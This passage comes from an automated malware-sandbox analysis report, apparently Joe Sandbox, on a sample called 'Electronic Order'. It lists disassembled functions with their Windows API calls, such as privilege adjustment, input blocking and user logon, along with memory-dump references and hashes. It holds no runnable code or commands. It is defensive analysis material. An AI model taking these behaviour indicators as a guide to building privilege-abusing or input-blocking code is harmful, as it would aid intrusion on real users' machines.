                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Time$FileSystem__aulldiv__time64
                                      • String ID: 0u
                                      • API String ID: 2893107130-1339160046
                                      • Opcode ID: 37325b1baad02343805980a41979d427cfaccd48e2c865182562e731236eba45
                                      • Instruction ID: c88598cbae52aa1203a782038e8dbf5b1a22b5528638b079052545c74609dc83
                                      • Opcode Fuzzy Hash: 37325b1baad02343805980a41979d427cfaccd48e2c865182562e731236eba45
                                      • Instruction Fuzzy Hash: C321E4726355108FC329CF29E841A52B3E1EBA5311B289E6CD0F9DB2D0CA34B905CB94
                                      Function 00DCE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ec1f6d4f5962c44d852abece49d0d5ca2f46da1e74088aba293b12e4b0170587
                                      • Instruction ID: 24d2fe0847a18565bf58087d2532194d164ff5e8e2b9cc865975855bee75ed68
                                      • Opcode Fuzzy Hash: ec1f6d4f5962c44d852abece49d0d5ca2f46da1e74088aba293b12e4b0170587
                                      • Instruction Fuzzy Hash: 5C228CB4A00256CFDB24DF54C481BAAF7B4FF04300F18856DE896AB391D775E985CBA1
                                      Function 00E2C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E2C966
                                      • FindClose.KERNEL32(00000000), ref: 00E2C996
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: af485e27ff84cd4ef7714ed41c931f83dc130ac8c141f23f1250b1bf510ff17a
                                      • Instruction ID: a6007936e7e1ee49cad023815b31365de2b8ba9619a96b00f14893be15f78142
                                      • Opcode Fuzzy Hash: af485e27ff84cd4ef7714ed41c931f83dc130ac8c141f23f1250b1bf510ff17a
                                      • Instruction Fuzzy Hash: CE11A1366006109FD710EF29D859E2AF7E9FF85724F00851EF9AAD72A1DB70AC05CB91
                                      Function 00E2A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E3977D,?,00E4FB84,?), ref: 00E2A302
                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E3977D,?,00E4FB84,?), ref: 00E2A314
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 1eb798d680c47b9c1e394383f8c41cb05f5daa134b398873bf44bc4e4bdb623f
                                      • Instruction ID: 12bfcf9603420f8f6ef9084d62ae19c8308df5f04a34ef3fc353fab3797fb1b6
                                      • Opcode Fuzzy Hash: 1eb798d680c47b9c1e394383f8c41cb05f5daa134b398873bf44bc4e4bdb623f
                                      • Instruction Fuzzy Hash: 28F0823554422DEBDB109FA4DC48FEA776DFF09761F008269F908E7191D6709944CBB1
                                      Function 00E18713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E18851), ref: 00E18728
                                      • CloseHandle.KERNEL32(?,?,00E18851), ref: 00E1873A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AdjustCloseHandlePrivilegesToken
                                      • String ID:
                                      • API String ID: 81990902-0
                                      • Opcode ID: f781008b384dec01aab9243fdf7e3a115c906436a99618116e97f4b728ed3845
                                      • Instruction ID: 892292392425ba06b587a85ffec66cb5629e6abbcf5d3f71f8d0c6c9b9775159
                                      • Opcode Fuzzy Hash: f781008b384dec01aab9243fdf7e3a115c906436a99618116e97f4b728ed3845
                                      • Instruction Fuzzy Hash: 6CE0463A000640EEE7212B22EC09D73BBE9EB00750B608829F89680870CB32AC91DB20
                                      Function 00DEA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00DE8F97,?,?,?,00000001), ref: 00DEA39A
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00DEA3A3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 3bbe166617baf5e3fe0c366f6e3c61e201cd13cd73dd7d802de8f423a6ca18b0
                                      • Instruction ID: 65806b81f0b8b01e295ab784d81dfc6c87fd94c6873506a1f77404f8863261f3
                                      • Opcode Fuzzy Hash: 3bbe166617baf5e3fe0c366f6e3c61e201cd13cd73dd7d802de8f423a6ca18b0
                                      • Instruction Fuzzy Hash: 88B09235054208AFCA002F92EC09F883F68EB46EA2F404020F60D94060CB6254568A91
                                      Function 00DEF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 373ae72873a9dd5428a0c6b4f5243a1a3b35d0822a45f538a27ff4165b093422
                                      • Instruction ID: e0c8aaf690deda72bda093ca335e693583bfff6765bfa444a4c89ce2764bbc70
                                      • Opcode Fuzzy Hash: 373ae72873a9dd5428a0c6b4f5243a1a3b35d0822a45f538a27ff4165b093422
                                      • Instruction Fuzzy Hash: 52325722D29F414DD767A636D872335A289AFB73C5F24DB37F819B59A6EB28C4C30110
                                      Function 00DF267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 36febdfefdbda6821b45435add5053c7f0b2269855afba790e737194d6a0e838
                                      • Instruction ID: ca6017961c2b3f989c9aea4fe2925e4206bed7dcbcee6852c34f0b94a50b0e54
                                      • Opcode Fuzzy Hash: 36febdfefdbda6821b45435add5053c7f0b2269855afba790e737194d6a0e838
                                      • Instruction Fuzzy Hash: 6FB1F520D2AF414DD72396398831336BB5CAFB72DAF56DB2BFC2674D22EB2185874141
                                      Function 00E341FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 00E34218
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: 24fad1a2c06ec9b22fce0e47f115f41559d37df39458f5c6fce6205f35669967
                                      • Instruction ID: 5a4b1fa99b180ab4992f5c1249fb93008d507c187328f25be013fdfeb549361f
                                      • Opcode Fuzzy Hash: 24fad1a2c06ec9b22fce0e47f115f41559d37df39458f5c6fce6205f35669967
                                      • Instruction Fuzzy Hash: 30E012752401159FC7109F5AD448E9AFBD8EF54760F018019FC49E7261DA70A841CBA0
                                      Function 00E24EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E24F18
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: mouse_event
                                      • String ID:
                                      • API String ID: 2434400541-0
                                      • Opcode ID: 399695560d53086787ff6d5c37446074fe8d384a94a2c83b084ea2868c74df21
                                      • Instruction ID: b4b33bf5e21503531ccb3043f393c31c2848d6e0065247b0c347ff778e44a8de
                                      • Opcode Fuzzy Hash: 399695560d53086787ff6d5c37446074fe8d384a94a2c83b084ea2868c74df21
                                      • Instruction Fuzzy Hash: 74D05EF43642253CFC184B20BE0FFB60108E3C0B85F8879897205B98C5A8E56C00A835
                                      Function 00E18C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E188D1), ref: 00E18CB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LogonUser
                                      • String ID:
                                      • API String ID: 1244722697-0
                                      • Opcode ID: d54a45095211f01246239e51083258535a9a684fe07bb8e1ea2d65c482947880
                                      • Instruction ID: 65c4e923bce55535c964aabd4d84bdb8fa18a8207e397c6e48cbdcd72867d63f
                                      • Opcode Fuzzy Hash: d54a45095211f01246239e51083258535a9a684fe07bb8e1ea2d65c482947880
                                      • Instruction Fuzzy Hash: F1D05E3226050EAFEF018EA4DC01EAF3B69EB04B01F408111FE15D50A1C775D835AB60
                                      Function 00E02230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 00E02242
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: f3c097601cfefd9492a7089886ca4fb40c1cde8bf3fd407011e455536a3e749a
                                      • Instruction ID: 394203027f516d39cfa66912a4581a2e5c3050c2c2ffd36c98866348d81d8d66
                                      • Opcode Fuzzy Hash: f3c097601cfefd9492a7089886ca4fb40c1cde8bf3fd407011e455536a3e749a
                                      • Instruction Fuzzy Hash: 6BC048F5C00109DBDB15DBA0DA88DEEB7BCAB08304F2040A6E102F2140E7749B888E71
                                      Function 00DEA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00DEA36A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 858ac8bafb14a7aadebf86be8e703b1b147cc7413de6ca0df57505146ca65f91
                                      • Instruction ID: d11799791f4e730da05a94556677a59095dda3f7d17438f927cb2d93164397e5
                                      • Opcode Fuzzy Hash: 858ac8bafb14a7aadebf86be8e703b1b147cc7413de6ca0df57505146ca65f91
                                      • Instruction Fuzzy Hash: 01A0113000020CAB8A002F82EC08888BFACEB02AA0B008020F80C800228B32A8228A80
                                      Function 00DD8A0E Relevance: .6, Instructions: 608COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 78ffda75dab684ce9a02f572e14f235841d6b9c768d687c1e51fb2e332555097
                                      • Instruction ID: 157c2d9b1ae6d068f5afc7b2f025192a31f9e39d5c835b62f62e14e62a67e390
                                      • Opcode Fuzzy Hash: 78ffda75dab684ce9a02f572e14f235841d6b9c768d687c1e51fb2e332555097
                                      • Instruction Fuzzy Hash: C3223731511616CBDF3A8B2DC4846BDB7A1EB81344F29846BD896AB391DB30DDC1EB70
                                      Function 00DE2405 Relevance: .3, Instructions: 345COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction ID: 4e15ad774c136655ea18f342cc2d3a28dc3cd65654fd86075bc7ef886dc451e5
                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction Fuzzy Hash: BAC16D372051D30ADB2D963B947413EBAE55EA27B131E0B6DE8B2CB5C4EF20D564E630
                                      Function 00DE283A Relevance: .3, Instructions: 341COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction ID: fd5ee5448c34e92c9b539eff81d512daba644c0b501269c5eb369f559e50fe5f
                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction Fuzzy Hash: C5C19D372091D30ADB2D563B887403EBBE55EA27B131E176DE4B2DB4C5EF20D564A630
                                      Function 00DE1BB8 Relevance: .3, Instructions: 323COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction ID: 672295fb1ac58aa318c1a236b792c671f5d06fd943c1316149b9605cb54572d5
                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction Fuzzy Hash: 24C15C3B3091D309DB2D563B943413EBAA15EA27B131E0B6DE8B2CB5D4EF30D5649670
                                      Function 01583630 Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction ID: 91692b71e4edf465bae73223bdca1a29e3440aba5b9b5d71a6fe3d8067a90483
                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction Fuzzy Hash: 1441C471D1051CDBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB40
                                      Function 015834C0 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction ID: eb51c67c1222c9ad3fffd16e36ff724c4697cd81df6116bb094e53200c7009a5
                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction Fuzzy Hash: 9E019278A00109EFCB84EF98C5909AEF7F5FB48710F208599D809AB701E731EE41DB90
                                      Function 01583520 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction ID: 166ad7b235f67322d539830bce0e12fb17899f236dd09d7a349ea0dac3b9d1af
                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction Fuzzy Hash: 1C019278A00109EFCB84EF98C5909AEF7F5FB48710F208599D809AB701E730EE41DB90
                                      Function 01581E70 Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                      Function 00E437F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,00E4F910), ref: 00E438AF
                                      • IsWindowVisible.USER32(?), ref: 00E438D3
                                      Strings
                                      Memory Dump Source
